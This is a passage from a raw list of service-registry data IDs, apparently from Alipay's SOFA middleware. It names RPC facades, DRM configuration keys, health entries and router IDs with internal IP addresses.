late:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.promocommopt.common.service.facade.minestar.api.MinestarPrizeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditmerchant.service.facade.TemplateInstanceQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@mobilesearch#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.fraudmng:name=com.alipay.rule.core.repository.drm.RepositoryConfigResource.repositoryLoaderTaskCoreSizeStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.tegg.trserver.AppFacade2:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.22.177#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bizfund.common.service.facade.solution.api.FundFreezeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeRService:1.0:dcepprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.core.service.drm.MacDRMResource.whiteRuleCode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.merchant.common.service.facade.MerchantRelationService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.service.drm.SimulateModeFixedData2NewDrmImpl.taskIdWhiteList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.caprod.biz.sign.facade.SignTaskFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.app.PublicAppFacade:1.0:publiccore_public_app@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.core.topology.sdk.GraphValidateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.RiskmngComplainContentConsultCallBack:1.0:secucommunity@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.basementweb.FileGroupFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprocess.facade.service.DataTypeServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.194.148#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.52.216.132#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mnotify.biz.client.client.rpc.MNotifyCallbackRPCService:1.0:mobilesecurity@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dpcscgateway.common.service.facade.risk.NtmRiskCheckServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:init-with-profile@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.common.service.facade.purchase.CommoditiesPurchaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.WalkDonateHomeFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.154.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkoyzcore_preEnvProcessCallback_v2@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finbatch:name=com.alipay.guardian.client.sofa.drm.GuardianDrm.checkMvelBlackKeyWords,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.argo.spi.publish.ArgoDeployDataConvertFacade:1.0:tradePayDeployDataConvertSpi@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.100.242#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openmonitor.risk.service.facade.RiskCollectFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dk.common.service.facade.open.api.verify.DataVerifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.insmobile.drm.instOnlineServiceDrm.instOnlineServiceUrlProfix,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:yebscenebff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:insuserview@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.finpwm:name=com.alipay.finpwm.core.orderexec.fundapply.config.impl.FundApplyExecConfigDRMResource.stopProfitNotifyConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_LDM#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openhome.facade.bind.PublicAppBindMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fpdecision.dfriskmng.facade.DxCommonFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charge.service.facade.ChargeOperationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudprod.facade.barrier.OpsCldBarrierFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcloanapply.common.service.facade.service.apply.ApplyManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.peerpayprod.common.service.facade.FamilyPayCampaignQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kmi.common.service.facade.KeyQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.124.175.205#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.ActionLogRzoneService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradecore:name=com.alipay.tradecore.service.zoneclient.impl.TradeCreateElasticDRM.tradeFromBlackListStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mwealthprod.common.service.facade.spi.YouthGroundFunctionLifecycleSpi:1.0:MONEY_BOX@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.supergw.service.facade.transaction.OutSyncTransCallBack:1.0:fininflux@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.drc.rm.endpoint.facade.TaskRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mservicesinspect.common.service.integration.unitestcenter.QualityReportQueryClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.merchant.common.service.facade.OrderLinkRelationService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fincommonbff:name=com.alipay.sla.businessgray.drm.BusinessGrayGlobalSwitcher.closeLoggers,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cifprocess.loadtest.CustomerTagQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.test.DiscountSchedulerTriggerService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.pointprod.common.util.resource.PointCapacityDrmResouce.exchangeOutBizTimeCheckBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.facade.pam.PamPolicyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mapitool.facade.api.ApiFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acprodapicore.facade.manageapi.RuntimeProviderManager:1.0:product@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifprocess.custdpc.worker.WorkerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.kernel.common.service.facade.SlaFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.openexprod.common.service.facade.UserInfoQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:dcepcoin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.admin.SchemaConfigAdminApi:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vega.api.service.facade.service.DataStreamPipelineService:1.0:databus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.181#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iprocess.sip.action.Action:1.0:pushProcessAction@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintradecenter.core.service.repository.InstSignContractRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.PermlimitAvailableSwitchConfig.filterAppsStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:zimtmsvcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarvis.service.facade.api.user.UserPermissionManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icardcenter.service.facade.api.write.BindCardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.etetestcore:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditagreement.nearclient.agreement.main.service.PcagCreditAgreementQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:finstocktradebff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dchainprod.common.facade.api.channel.FinancingChannelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mappprod.biz.shared.platform.app.AppQuerySwitchService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.download.DownloadCenterCallbackInterface:1.0:salaryTemplateInstanceDownloadCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.service.facade.oto.api.OtotransTransFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcreditprod.service.ClearCertificationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unibase.spi.adapter.facade.UniProcessSpiFacade:1.0:unibench@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.biz.service.IotDeviceLbsInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:mif_relation_biz_sync@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.pointmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.customJsonSuffixEndWith,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mservicesinspect.common.service.integration.calltronline.CallTROnlineMobilelbsClient:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.infosec.content.service.facade.HoloxConfirmService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.miniselfop.facade.api.minicontent.MiniContentAttrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchishub.biz.assettrace.facade.LifecycleQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.158.44.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.yuyan.swiftgw.ConsumerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpdcore:name=com.alipay.fc.pdcore.common.service.cacheclient.drm.ClientCacheConfigDRM.closeClientCacheRemoteCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finassetpreference.api.facade.FapResearchReportTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antdatashow.facade.api.ScreenManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alifi.naegis.service.loan.InterestSettleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmSlaDynamicDecisionTrigger.openIcbcDaikouValidateStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.riskmngTairCache.compressionType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opscloudcore.riskservice.spi.OpsChngEventListener:1.0:airbops_paas_sub@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.creditcore.service.facade.trans.CreditLoanFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zskynet.facade.logmonitor.service.MonitorResultQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alisis.core.service.compass.metrics.ServerGroupMetrics:1.0:DISK_CACHE_GROUP@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opencore.service.facade.message.UserMsgSubscribeFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:iMatchfacadeDetectTaskCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.prodmng:name=com.alipay.common.security.dresource.SecurityCommonDrm.htmRefererCheckerDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zqualitywalleetoe.common.service.facade.api.PluginManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.alideviceinfo.biz.shared.transport.TransportService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromobus.common.service.facade.thirdparty.SpuManageFacede:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.zskynetTairCache.zonePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zappinfo:name=com.alipay.common.security.dresource.SecurityCommonDrm.uriCheckEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.testmeshend.facade.ServiceOfControlMode3:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","HEALTHY@csassistant#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.antemc.service.facade.EmcEventFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.doubleReadPackagefeeLogMaster,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pfunddts.common.facade.api.PfundTairFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kmi.common.service.facade.DataKeyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.insautobff:name=com.alipay.sla.businessroute.drm.BusinessRoutePolicy.grayRoutePolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","HEALTHY_V2@gftax#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.alideviceinfo.common.service.facade.moneybox.MbBillFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recon.common.service.facade.fund.api.FundBillConfigManageService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.isv.common.service.facade.AreaMapFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileappcommon.common.service.facade.baas.AppRoleConfigMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_192.168.11.35#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditbenefit.facade.api.kabao.KabaoManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Sub_Servers_TP-S-MOBILEAPP-CDN#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.ufe.meta.facade.service.ScriptService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchasset.common.service.facade.supplymentsend.AssetSupplymentSendManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrmcore.common.service.facade.service.model.MdpModelSecurityInfoService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.core.service.factor.FactorInvokeOrderService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.innertrans.facade.api.InnerAccountCorrectTransValidateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gauss.recmng.common.service.facade.api.ContentManageServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobileiclib.common.service.facade.product.papers.PapersProductQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:hytest@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchdtunical.common.service.facade.DtOpsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.233.70#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.baoxiangw.common.service.api.InvokeInsuranceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.aciamcore.common.service.facade.common.DeprecatedServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudengine:name=com.alipay.cloudengine.loglevel.etetestcore.logLevelConfig,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mdeviceprod.common.service.facade.opsconfig.RuleConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdeviceprod.common.service.facade.iotcloud.IOTCloudDeviceRegisterFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.compareCache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cscheck.service.facade.api.QualityCheckDataRuleTestFlowFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_OVERSEAMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsLdcManager.contentCacheProps,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","config:com.alipay.alphasec.compass.sanction.facade.SanctionService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.finfocore.common.service.facade.fop.api.CrowdTagFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.ifcidentitycloudus:name=com.antcloud.ifcidentitycloudus.common.util.mic.PubResouceHolder.useKybMock,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pccontractprod.common.service.facade.admin.api.AlterationAdminFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.amberdata.admin.service.UnitService:1.0:unitService@bolt#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.almcenter.service.facade.api.AlmToolFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:edubizsp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mshopcenter.common.service.facade.api.CategoryManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fiscore.common.service.facade.cl.api.CollectionFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.yqcore.common.service.ha3.query.service.Ha3QueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.wishtree.rpc.WishTreeRpc:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmFopCacheConfig.contentElementExpireTime,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.charge:name=com.alipay.charge.common.dal.conf.impl.ChargeNewDRMConfigureImpl.deleteRefundEventByNo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.promocenter:name=com.alipay.promocenter.common.drm.MerchantOperatorResource.openHomeOperatorPromoMenuShowChilds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cap.common.openapi.internal.OpenApiService:1.0:antcloud_dpc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobilechat.common.service.facade.api.GroupServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.openhome.facade.OpenPlatformOperatorManageFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cap.common.service.CapSessionService:1.0:${version}@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.cif.facade.PasswordSecureInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchasset.common.service.facade.common.AssetSupplierQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.feature.common.service.facade.service.WideTableService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finassistantmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.ScriptEvalServiceFacade:1.0:sesameCredit_zmcie@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.TransferService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sts.service.facacde.BugQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.acctrans.facade.api.acctrans.AcctransListenFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpublishuiweb:name=com.alipay.sofa.middleware.switcher.drm.GlobalSwitchResource.enableJdkSerializeBlackList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.cfpcenter:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.disableSync,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:secudownload@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.exratecenterTairCache.legacyRwWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcardcore.common.service.facade.PcardModelQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.promocenter:name=com.alipay.promocenter.common.drm.HumanToHumanDrmResource.useRate,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.insusercenter.client.policydetail.extension.PolicyBizInfoFetcherComponent:1.0:insusercenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finauth.common.service.facade.inst.service.InstContractQueryGzoneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.stockassetcore.common.service.facade.watchlist.WatchlistGroupManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.changeriskmanage.common.service.facade.callback.ProcessCallback:1.0:offLineProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iprobe.common.service.facade.api.DataBridgeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.mybank.bkmportal.service.loan.api.LoanApplyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.riskmng:name=com.alipay.riskmng.core.service.drm.impl.TaskSwitchResourceImpl.decisionCustomer,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pvsofabootserver.facade.SofabootRpcServerSpFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservcenter.common.service.facade.kbcscenter.VisitRecordFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbservindustryprod.common.service.facade.merchantactivity.MerchantActivityRealTimeCheckQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.rdf.gray.config.facade.service.RdfGrayConfigOptService:1.0:finscprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.echox.service.EchoxAopPlaybackService:1.0:insclaiminvestprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_10.15.238.118#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.findecision:name=com.alipay.common.tracer.manage.TracerDrm.disableMiddlewareDigestLog,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.openhome.biz.platform.apipackage.PackageAuditManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.itemcore.common.service.facade.v2.ItemFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.antfeaturelib.common.facade.service.FeatureCalcService:1.0:publicDomain_zmcustcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_ADDP_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alibaba.dataphin.resource.common.facade.spi.RecycleSpi:1.0:dpdataprocess@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cifin.bankcard.service.facade.VerifiedServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:secretmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.shop.ShopStaffSalesRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbsales.common.service.facade.bcm.BPProcessCallbackFacade:1.0:invalidSignContractNode@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.admin.MinicoreForAdminOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.33.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.alphad.common.service.facade.tntinst.api.IDomainMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.mosng.endpoint.inner.BoltService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.jarvis.service.facade.api.translation.TranslationManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:zmepinfocenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.trsbrain.common.service.facade.spi.BizSelfCureServiceFacade:1.0:zskynet@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antgroup.zmxy.zmcserviceop.dispute.service.facade.DisputeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apyunqing.facade.AppFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","cn.com.antcloud.acauthcore.common.service.facade.manager.GroupManageFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.iprocess.sip.action.Action:1.0:gotoneTaskAction@DEFAULT#@#DE